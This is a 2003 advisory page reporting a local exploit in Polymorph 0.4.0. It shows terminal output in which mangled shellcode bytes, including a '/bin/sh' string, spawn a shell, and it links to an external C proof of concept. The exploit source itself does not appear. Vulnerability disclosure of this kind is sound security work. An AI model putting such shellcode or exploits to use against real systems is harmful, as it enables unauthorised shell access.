News Register Control Panel Private Messages Members List Team Search News Posts About Us 		 

Bug found in: Polymorph 0.4.0
  Author: Ravish Ahuja
 Added: 05/24/2003
 Type: Advisory
 Viewed: 282 time(s)
 [ Not Rated Yet ]
Proof of concept

     [demz@lab polymorph-0.4.0]$ ./c-polymorph

     Polymorph 0.4.0 local exploit
     ---------------------------------------- demz @ c-code.net --
     polymorph had trouble converting

                                  �1└1█1╔░F═�1└Phn/shh//bi�πPS���░
              ═�1└░═�����┴% to

                                   1└1█1╔░f═�1└phn/shh//bi�πps���░

              ═�1└░═ �����                  ≡≤ ┐...

     the file is now possibly corrupt
     sh-2.05b$

     A proof of concept exploit can be found at:
     http://www.c-code.net/Releases/Exploits/c-polymorph.c

Vendor response
The vendor is informed.

Article Pages:  � Prev | 1 | 2 | 3  



How would you rate this article:    Bad Good   Go � 


� Copyright Linux Advisory 2003. All rights reserved.
We are not responsible for the comment and story contributed by users.